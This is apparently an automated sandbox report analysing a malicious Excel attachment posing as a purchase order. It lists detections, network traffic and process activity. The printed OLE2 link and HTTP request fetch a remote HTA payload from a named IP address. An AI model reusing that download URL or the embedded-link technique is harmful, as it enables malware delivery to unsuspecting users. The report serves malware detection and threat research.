Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-ARJ-2025-15ACA.xla.xlsx

Overview

General Information

Sample name:PO-ARJ-2025-15ACA.xla.xlsx
Analysis ID:1639278
MD5:9d0c7d82a1c18e1006e6075584652e83
SHA1:68f97d343b3419df1b2d25c50c0d72d6af4fd59e
SHA256:34954100e490a77310918573e56868e651855b54ddb0cc0dd334f55e8e195f14
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7588 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 6808 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 7108 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO-ARJ-2025-15ACA.xla.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.12.89.24, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7588, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 53975
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 53975, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7588, Protocol: tcp, SourceIp: 198.12.89.24, SourceIsIpv6: false, SourcePort: 80
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO-ARJ-2025-15ACA.xla.xlsxAvira: detected
Source: PO-ARJ-2025-15ACA.xla.xlsxReversingLabs: Detection: 38%
Source: PO-ARJ-2025-15ACA.xla.xlsxVirustotal: Detection: 43%Perma Link
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.24:63465 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.24:63464 version: TLS 1.2
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.24:63462 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:63462
Source: global trafficTCP traffic: 192.168.2.24:63462 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:63462
Source: global trafficTCP traffic: 192.168.2.24:63462 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:63462
Source: global trafficTCP traffic: 192.168.2.24:63462 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 192.168.2.24:63465 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63465
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:63464 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63464
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:63462 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 198.12.89.24Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120201v19s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 198.12.89.24Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 15 Mar 2025 08:01:19 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 298Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 31 32 2e 38 39 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.12.89.24 Port 80</address></body></html>
Source: PO-ARJ-2025-15ACA.xla.xlsx, 05550000.0.drString found in binary or memory: http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
Source: Primary1742025627685531500_16DDE69B-6814-49DF-9491-E1CDE079856F.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Primary1742025627685531500_16DDE69B-6814-49DF-9491-E1CDE079856F.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/41402421625
Source: Primary1742025627685531500_16DDE69B-6814-49DF-9491-E1CDE079856F.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/43296341670
Source: unknownNetwork traffic detected: HTTP traffic on port 63464 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63465 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63465
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63464
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.24:63465 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.24:63464 version: TLS 1.2

System Summary

barindex
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE: Microsoft Excel 2007+
Source: 05550000.0.drOLE: Microsoft Excel 2007+
Source: 05550000.0.drOLE: Microsoft Excel 2007+
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE indicator, VBA macros: true
Source: PO-ARJ-2025-15ACA.xla.xlsxStream path 'MBD003296A9/\x1Ole' : http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta}c2k~;YMP~#:jul8imQHRNLi4k6agtJlqyK7jVsacjoYbopLX46EpMikrPqaGOCPkjhGSlluzrHNA19YzF94SOYQ3dY7G64aAc5cVj5Mq42wOwJg1dZUVXBkJMbxE2CZvqYTLfQiGju8bBNONAaGVKbLATmvFae8iKP5g7HCwh=l t8UOV
Source: 05550000.0.drStream path 'MBD003296A9/\x1Ole' : http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta}c2k~;YMP~#:jul8imQHRNLi4k6agtJlqyK7jVsacjoYbopLX46EpMikrPqaGOCPkjhGSlluzrHNA19YzF94SOYQ3dY7G64aAc5cVj5Mq42wOwJg1dZUVXBkJMbxE2CZvqYTLfQiGju8bBNONAaGVKbLATmvFae8iKP5g7HCwh=l t8UOV
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'po-arj-2025-15aca.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.winXLSX@4/13@1/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO-ARJ-2025-15ACA.xla.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{16DDE69B-6814-49DF-9491-E1CDE079856F} - OProcSessId.datJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxOLE indicator, Workbook stream: true
Source: 05550000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxReversingLabs: Detection: 38%
Source: PO-ARJ-2025-15ACA.xla.xlsxVirustotal: Detection: 43%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO-ARJ-2025-15ACA.xla.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxStatic file information: File size 1172992 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: 05550000.0.drInitial sample: OLE indicators vbamacros = False
Source: PO-ARJ-2025-15ACA.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
